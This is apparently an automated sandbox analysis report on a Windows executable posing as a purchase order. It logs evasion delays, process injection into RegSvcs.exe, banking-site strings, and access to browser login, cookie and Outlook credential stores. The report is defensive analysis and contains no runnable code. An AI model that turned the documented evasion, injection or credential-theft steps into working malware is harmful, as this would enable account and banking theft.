                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00654A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006733C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006733C7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Process information set: NOOPENFILEERRORBOX (2 identical events)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (59 identical events)

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe API/Special instruction interceptor: Address: 37E3214
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599641
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599531
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599421
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599203
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599094
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598087
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597985
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597482
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597141
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596891
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596344
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596125
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595891
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594969
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594625
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594516
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594406
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594297
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594063
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7989
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1861
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-100123
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe API coverage: 4.3 %
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006B4696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_006B4696
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006BC93C FindFirstFileW,FindClose, 0_2_006BC93C
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_006BC9C7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_006BF200
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_006BF35D
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_006BF65E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_006B3A2B
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_006B3D4E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_006BBF27
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_00654AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00654AFE
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3423035452.00000000012BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe API call chain: ExitProcess graph end node graph_0-98116
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe API call chain: ExitProcess graph end node graph_0-98190
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006C41FD BlockInput, 0_2_006C41FD
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_00653B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00653B4C
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_00685CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00685CCC
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006CC304 LoadLibraryA,GetProcAddress, 0_2_006CC304
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_037E34E0 mov eax, dword ptr fs:[00000030h] 0_2_037E34E0
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_037E3480 mov eax, dword ptr fs:[00000030h] 0_2_037E3480
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_037E1E70 mov eax, dword ptr fs:[00000030h] 0_2_037E1E70
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_006A81F7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_0067A364 SetUnhandledExceptionFilter, 0_2_0067A364
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_0067A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0067A395
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DF5008
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006A8C93 LogonUserW, 0_2_006A8C93
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_00653B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00653B4C
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_00654A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00654A35
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006B4EF5 mouse_event, 0_2_006B4EF5
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe"
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_006A81F7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006B4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_006B4C03
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Binary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_0067886B cpuid 0_2_0067886B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006850D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_006850D7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_00692230 GetUserNameW, 0_2_00692230
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_0068418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_0068418A
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_00654AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00654AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR
                Source: Yara match, File source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Binary or memory string: WIN_81
